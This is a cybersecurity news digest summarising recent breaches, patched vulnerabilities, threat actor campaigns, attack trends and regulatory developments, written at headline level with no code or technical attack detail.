Major Incidents or Breaches

  • The U.S. Congressional Budget Office (CBO) confirmed a cybersecurity incident attributed to a suspected foreign threat actor. Sensitive data may have been exposed.
  • SonicWall disclosed that a nation-state actor breached its cloud backup service, stealing firewall configuration files of all customers using the service. This incident is not connected to recent Akira ransomware activity.
  • Hyundai AutoEver America reported a data breach from February, with attackers stealing Social Security Numbers and other personal information.
  • The State of Nevada completed recovery from a ransomware attack that began as early as May 2025 and was discovered in August. The attack impacted 60 state agencies and disrupted critical health and public safety services.
  • The DeFi protocol Balancer began recovering funds after hackers exploited a vulnerability to steal $128 million in cryptocurrency.
  • New data revealed that UK water systems have been targeted by hackers five times since 2024, highlighting increased risks to critical infrastructure.

Newly Discovered Vulnerabilities

  • Cisco released patches for critical vulnerabilities in its Unified Contact Center Express (UCCX) software and Contact Center Appliance. The flaws (including CVE-2025-20333 and CVE-2025-20362) allow remote code execution and privilege escalation to root.
  • Multiple security vulnerabilities were identified in ChatGPT, including issues with memory and web search features. These bugs could allow data exfiltration, prompt injection, bypassing safety mechanisms, and other malicious actions.

Notable Threat Actor Activity

  • Russian state-backed group Sandworm deployed multiple data-wiping malware families in attacks targeting Ukraine’s education, government, and grain sectors.
  • A previously unknown threat cluster impersonated ESET in phishing campaigns against Ukrainian entities, distributing trojanized installers that deploy the Kalambur backdoor.
  • State-sponsored actors were responsible for the SonicWall cloud backup breach.
  • Phishing campaigns are actively targeting LastPass users with fake death notifications to gain account access, and Microsoft Help Desk-themed phishing emails continue to circulate.

Trends, Tools, or Tactics of Interest

  • A malicious Visual Studio Code (VS Code) extension with ransomware capabilities was discovered on the official marketplace. The extension, apparently created with AI assistance, can encrypt files on a victim’s system.
  • ClickFix malware attacks have evolved to include multi-OS support, video tutorials to guide victims through self-infection, countdown timers to pressure users, and automatic OS detection.
  • Android malware leveraging NFC technology is being used to steal card details and PINs for instant ATM withdrawals.
  • Deepfake and synthetic video technologies are increasingly being abused for fraud, requiring enhanced verification protocols.
  • Cybercrime is increasingly funding organized crime, with online scams supporting real-world criminal activities and violence-as-a-service models.
  • Continuous purple teaming and breach and attack simulation (BAS) are being promoted as effective ways to validate security controls and close detection gaps in enterprise environments.
  • Agentic AI tools are being integrated into attack chains, requiring stronger oversight, least privilege, and red-teaming to mitigate risks.

Regulatory or Policy Developments Affecting the Security Industry

  • Financial services are now subject to prescriptive regulatory requirements for cyber-resilience, moving beyond best practices to operational mandates.
  • New initiatives are being launched to increase transparency in social media advertising, aiming to address the proliferation of scam ads.
  • Increased focus on privacy controls, as evidenced by updates to consumer security products, reflects evolving regulatory and user expectations.